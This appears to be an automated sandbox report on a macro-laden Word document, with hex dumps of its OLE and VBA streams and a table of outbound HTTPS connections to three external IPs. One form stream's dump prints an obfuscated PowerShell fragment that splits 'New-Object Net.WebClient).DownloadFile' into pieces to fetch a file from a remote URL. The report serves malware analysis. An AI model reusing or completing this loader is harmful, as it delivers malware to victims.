Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . l . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . : ( . . H . Q 6 . . . . . ; . . k ) . * F . . 6 l . y . . . " . J o . w @ . ^ . . = l . r . . . . . . . . . . f H . . . . B ? ; . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . f H . . . . B ? ; . . . . : ( . . H . Q 6 . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 02 00 01 00 00 a0 0a 00 00 e4 00 00 00 84 02 00 00 ce 0a 00 00 e8 0a 00 00 6c 13 00 00 00 00 00 00 01 00 00 00 7e 8f bf b1 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 40 00 ff ff 00 00 fb a8 ef 3a 28 c5 a3 48 a5 51 36 e0 c5 f1 ff fb 3b b6 c9 6b 29 b9 2a 46 86 8d 36 6c d3 79 0d 09 85 22 07 4a 6f d5 77 40 87 5e a6 d4 3d

VBA Code

VBA File Name: Module1.vba, Stream Size: 15671

General
Stream Path:	Macros/VBA/Module1
VBA File Name:	Module1.vba
Stream Size:	15671
Data ASCII:	. . . . . . . . . . $ . . . . . . . . . . . . . . $ . . % 6 . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . . . . . . . . . . . C r e a t e C o m p a t i b l e D C . . . . X . < . . . . . . . . . . . . . . . O l e C r e a t e P i c t u r e I n d i r e c t . . . . . . . . l . . . . . . . . . . . . . . . C r e a t e C o m p a t i b l e B i t m a p . . . . . . . . . . . . . . . . . . . . . . G e t D e v i c e C a p s . . . . . . . . . . . . . . . . . . . . . . . P
Data Raw:	01 16 01 00 01 e8 04 00 00 14 24 00 00 cc 04 00 00 20 06 00 00 ff ff ff ff 1d 24 00 00 25 36 00 00 00 00 00 00 01 00 00 00 7e 8f 98 9d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 00 00 01 01 f8 03 00 00 14 00 28 00 14 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 43 72 65 61 74 65 43 6f 6d 70 61 74 69 62 6c 65 44 43 00 00 14 00 58 00 3c 00 00 00 ff ff 00 00 00 00 00 00 00 00 00 00 4f

VBA Code

VBA File Name: ThisDocument.cls, Stream Size: 1593

General
Stream Path:	Macros/VBA/ThisDocument
VBA File Name:	ThisDocument.cls
Stream Size:	1593
Data ASCII:	. . . . . . . . . v . . . . . . . . . . . . . . . . . . . n . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . < . . . . . . . e . . . . I . . w . . . : . 5 . F . 9 O . G . . ~ Y R E * . . . . . . . . . . . . . . . . . . . . . + K . . . . . I . . @ . . . . C . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . + K . . . . . I . . @ . . . . C . . e . . . . I . . w . . . : . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 02 00 01 00 00 76 04 00 00 e4 00 00 00 ea 01 00 00 a4 04 00 00 b2 04 00 00 6e 05 00 00 00 00 00 00 01 00 00 00 7e 8f ac e5 00 00 ff ff a3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 3c 00 ff ff 00 00 a8 b6 65 0e bf 83 05 49 90 1c 77 10 e2 cb 3a de 35 d7 46 89 39 4f c5 47 bb 97 7e 59 52 45 2a 1e 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

VBA File Name: bxh.vba, Stream Size: 2961

General
Stream Path:	Macros/VBA/bxh
VBA File Name:	bxh.vba
Stream Size:	2961
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 02 f0 00 00 00 c4 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff f3 05 00 00 db 09 00 00 00 00 00 00 01 00 00 00 7e 8f f2 d1 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 04 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	114
Entropy:	4.42107393569
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 c4 ee ea f3 ec e5 ed f2 20 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.304237108368
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S P e c i a l i S T R e P a c k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 fc 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 8c 00 00 00 06 00 00 00 94 00 00 00 11 00 00 00 9c 00 00 00 17 00 00 00 a4 00 00 00 0b 00 00 00 ac 00 00 00 10 00 00 00 b4 00 00 00 13 00 00 00 bc 00 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	4096
Entropy:	0.421150499361
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 8 . . . . . . . D . . . . . . . L . . . . . . . T . . . . . . . \\ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 64 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 bc 00 00 00 06 00 00 00 c8 00 00 00 07 00 00 00 d4 00 00 00 08 00 00 00 e8 00 00 00 09 00 00 00 f4 00 00 00

Stream Path: 1Table, File Type: data, Stream Size: 7415

General
Stream Path:	1Table
File Type:	data
Stream Size:	7415
Entropy:	5.92345208654
Base64 Encoded:	True
Data ASCII:	. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
Data Raw:	0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00

Stream Path: Data, File Type: data, Stream Size: 117435

General
Stream Path:	Data
File Type:	data
Stream Size:	117435
Entropy:	7.04509953295
Base64 Encoded:	True
Data ASCII:	. . . . D . d . . . . . . . . . . . . . . . . . . . . . . H . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . . . . . . C . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . _ . 3 . . . . . . . . . . . . . . . R . . . % . . . . . . . ) . . . . ] . . . . . d . . . . . . . . . . . . D . . . . . . . . F . . . . . . . . ) . . . . ] . . . . . d . . . . . . . . . J F I F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	bb ca 01 00 44 00 64 00 00 00 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 a8 48 c6 66 f4 01 f4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 42 00 00 00 b2 04 0a f0 08 00 00 00 06 04 00 00 00 0a 00 00 43 00 0b f0 1e 00 00 00 04 41 01 00 00 00 05 c1 06 00 00 00 06 01 02 00 00 00 ff 01 00 00 08 00 5f 00 33 00

Stream Path: Macros/Form/\x1CompObj, File Type: data, Stream Size: 97

General
Stream Path:	Macros/Form/\x1CompObj
File Type:	data
Stream Size:	97
Entropy:	3.61064918306
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: Macros/Form/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 283

General
Stream Path:	Macros/Form/\x3VBFrame
File Type:	ASCII text, with CRLF line terminators
Stream Size:	283
Entropy:	4.53231351509
Base64 Encoded:	True
Data ASCII:	V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } F o r m . . C a p t i o n = " r e f f " . . C l i e n t H e i g h t = 8 0 5 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 1 1 1 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w n e r . . T
Data Raw:	56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 46 6f 72 6d 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 72 65 66 66 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 20 20 38 30 35 35 0d 0a 20 20

Stream Path: Macros/Form/f, File Type: data, Stream Size: 63528

General
Stream Path:	Macros/Form/f
File Type:	data
Stream Size:	63528
Entropy:	7.77356678439
Base64 Encoded:	True
Data ASCII:	. . $ . . . . . . . . . . . . . . . . . } . . . L . . . 7 . . . . . . . . . . . R . . . . . . . . . . . K . Q l t . . . . . . . . . . . L E x i f . . M M . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b . . . . . . . . . . . j . ( . . . . . . . . . . . 1 . . . . . . . . . r . 2 . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . ' . . . . . . . ' . A d o b e P h o t o s h o p 2 2 . 5 ( W i n d o w s ) . 2 0 2 1 : 0 8 : 2 7 1 5 : 0 9 : 0 7 . . . . . . . . . . . . . . . .
Data Raw:	00 04 24 00 08 0c 20 0c 01 00 00 00 ff ff 00 00 02 00 00 00 00 7d 00 00 e5 4c 00 00 80 37 00 00 00 00 00 00 00 00 00 00 04 52 e3 0b 91 8f ce 11 9d e3 00 aa 00 4b b8 51 6c 74 00 00 b2 f7 00 00 ff d8 ff e1 0b 4c 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00

Stream Path: Macros/Form/o, File Type: data, Stream Size: 2200

General
Stream Path:	Macros/Form/o
File Type:	data
Stream Size:	2200
Entropy:	5.68532958328
Base64 Encoded:	True
Data ASCII:	. . x . ( . . . g . . . D i m W A I T P L Z , W S . . W A I T P L Z = D a t e A d d ( C h r ( 1 1 5 ) , 4 , N o w ( ) ) . . D o U n t i l ( N o w ( ) > W A I T P L Z ) . . L o o p . . . . L L 1 = " $ N a n o = ' J O O E X ' . r e p l a c e ( ' J O O ' , ' I ' ) ; s a l O Y $ N a n o ; $ a a = ' ( N e w - O b ' ; $ q q = ' j e c t N e ' ; $ w w = ' t . W e b C l i ' ; $ e e = ' e n t ) . D o w n l ' ; $ r r = ' o a d F i l e ' ; $ b b = ' ( ' ' h t t p s : / / g v m e
Data Raw:	00 02 78 08 28 00 00 00 67 08 00 80 44 69 6d 20 57 41 49 54 50 4c 5a 2c 20 57 53 0d 0a 57 41 49 54 50 4c 5a 20 3d 20 44 61 74 65 41 64 64 28 43 68 72 28 31 31 35 29 2c 20 34 2c 20 4e 6f 77 28 29 29 0d 0a 44 6f 20 55 6e 74 69 6c 20 28 4e 6f 77 28 29 20 3e 20 57 41 49 54 50 4c 5a 29 0d 0a 4c 6f 6f 70 0d 0a 0d 0a 4c 4c 31 20 3d 20 22 24 4e 61 6e 6f 3d 27 4a 4f 4f 45 58 27 2e 72 65 70

Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 546

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	546
Entropy:	5.3418107531
Base64 Encoded:	True
Data ASCII:	I D = " { E C B 6 4 9 9 8 - F 3 9 B - 4 E 0 4 - 8 1 4 B - 7 2 B 5 9 2 B 5 7 B 6 6 } " . . D o c u m e n t = T h i s D o c u m e n t / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . . . B a s e C l a s s = F o r m . . . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 4 D 6 3 5 5 A C F 4 3 D 3 4 3 D 3 4 3 D 3 4 3 D 3 " . . D P B = " C 1
Data Raw:	49 44 3d 22 7b 45 43 42 36 34 39 39 38 2d 46 33 39 42 2d 34 45 30 34 2d 38 31 34 42 2d 37 32 42 35 39 32 42 35 37 42 36 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 44 6f 63 75 6d 65 6e 74 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 0d

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 92

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	92
Entropy:	3.36718262128
Base64 Encoded:	False
Data ASCII:	T h i s D o c u m e n t . T . h . i . s . D . o . c . u . m . e . n . t . . . b x h . b . x . h . . . F o r m . F . o . r . m . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
Data Raw:	54 68 69 73 44 6f 63 75 6d 65 6e 74 00 54 00 68 00 69 00 73 00 44 00 6f 00 63 00 75 00 6d 00 65 00 6e 00 74 00 00 00 62 78 68 00 62 00 78 00 68 00 00 00 46 6f 72 6d 00 46 00 6f 00 72 00 6d 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 42465

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	42465
Entropy:	6.06781342936
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
Data Raw:	cc 61 af 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 09 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 1226

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	1226
Entropy:	6.66977814078
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . . . 9 c % . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s W O W 6 . 4 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * . \\ C . . . . . . 8 c .
Data Raw:	01 c6 b4 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 ed 02 39 63 25 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

Stream Path: WordDocument, File Type: data, Stream Size: 4096

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	4096
Entropy:	1.05423214792
Base64 Encoded:	False
Data ASCII:	. . . . U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . b j b j . n . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . > . . . . . . . > . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 55 00 19 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 02 08 00 00 0e 00 62 6a 62 6a eb 6e eb 6e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 0e 00 00 89 04 e9 61 89 04 e9 61 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 16, 2021 16:58:41.155510902 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:41.155567884 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:41.155649900 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:41.158219099 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:41.158284903 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:41.158379078 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:41.162049055 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:41.162113905 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:41.162183046 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:41.182198048 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:41.182224989 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:41.182360888 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:41.182395935 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:41.187180042 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:41.187218904 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:41.487505913 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:41.487608910 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:41.496016979 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:41.496206045 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:41.496231079 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:41.496254921 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:41.496773958 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:41.502512932 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:41.502557993 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:41.503112078 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:41.514960051 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:41.515059948 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:41.572217941 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:41.572248936 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:41.572679043 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:41.703150034 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:41.703257084 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:41.711148024 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:41.711278915 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:41.772418022 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:41.919406891 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:41.963150978 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:42.019290924 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:42.063150883 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:42.093477011 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:42.257554054 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:42.299149990 CEST	443	49168	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:42.299237013 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:42.303247929 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:42.441675901 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:42.649463892 CEST	443	49167	192.185.115.199	192.168.2.22
Sep 16, 2021 16:58:42.649730921 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:43.954046011 CEST	49167	443	192.168.2.22	192.185.115.199
Sep 16, 2021 16:58:44.059797049 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:44.074364901 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:44.074403048 CEST	443	49169	149.56.235.225	192.168.2.22
Sep 16, 2021 16:58:44.074481010 CEST	49169	443	192.168.2.22	149.56.235.225
Sep 16, 2021 16:58:44.505990028 CEST	49168	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.142384052 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.142438889 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:45.149818897 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.149863958 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.159379005 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:45.487956047 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:45.489392996 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:45.496134043 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.500142097 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.500174046 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:45.503434896 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:45.709860086 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.900049925 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:45.947140932 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:46.081351042 CEST	443	49170	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:46.096338987 CEST	49170	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:46.324939966 CEST	49171	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:46.324999094 CEST	443	49171	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:46.325110912 CEST	49171	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:46.335660934 CEST	49171	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:46.335715055 CEST	443	49171	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:46.646013975 CEST	443	49171	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:46.650016069 CEST	49171	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:46.662658930 CEST	49171	443	192.168.2.22	204.11.58.87
Sep 16, 2021 16:58:46.662709951 CEST	443	49171	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:46.663219929 CEST	443	49171	204.11.58.87	192.168.2.22
Sep 16, 2021 16:58:46.871169090 CEST	443	49171	204.11.58.87	192.168.2.22
